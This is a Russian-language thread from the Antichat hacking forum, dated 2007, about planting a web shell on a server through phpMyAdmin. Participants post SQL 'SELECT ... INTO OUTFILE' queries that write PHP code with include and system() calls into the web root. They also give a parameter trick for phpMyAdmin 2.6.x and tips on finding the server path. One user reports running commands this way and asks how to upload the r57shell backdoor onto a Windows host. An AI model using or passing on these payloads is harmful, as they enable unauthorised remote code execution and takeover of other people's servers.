Форум АНТИЧАТ - Залить ШЕЛЛ через PHPmyadmin

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)

- - Залить ШЕЛЛ через PHPmyadmin (https://forum.antichat.xyz/showthread.php?t=31153)

street16

13.01.2007 00:00

Залить ШЕЛЛ через PHPmyadmin

Собственно сабж

Abra	13.01.2007 00:03

помоему никак.

p-range

13.01.2007 00:14

если есть права на запись, выполняй запрос

select '<? include($_GET[sh]); ?>' from table into outfile '/home/user/...';

p-range

13.01.2007 01:27

2ettee
а какая разница между моим и твоим постом?

street16

13.01.2007 01:43

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

ShAnKaR

13.01.2007 01:51

кароче если версия 2.6.* и есть права на запись хоть в тмп, то можно
phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE

street16

13.01.2007 02:05

phpmyadmin/libraries/database_interface.lib.php нет там такого

версия phpMyAdmin 2.5.7

ShAnKaR

13.01.2007 02:13

Цитата:

Сообщение от street16

а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?

в phpmyadmin довольно много способов узнать локальный путь например попросить какойнить файл который обычно не вызывается на прямую а только инклудится, а потом попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php' либо вобще поищи на http://packetstormsecurity.org про phpmyadmin инфу

street16

13.01.2007 03:01

ок у меня получилось select '<?php system($cmd) ?>' into outfile '/path_to_phpmyadmin/shell.php'
ротом я набрал www.host/phpmyadmin/shell.php?cmd=dir,но там все в нечетабельном виде,как мне напрмер залить r57shell? На сервере стоит винда

ShAnKaR

13.01.2007 04:42

в pm

Время: 12:37

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице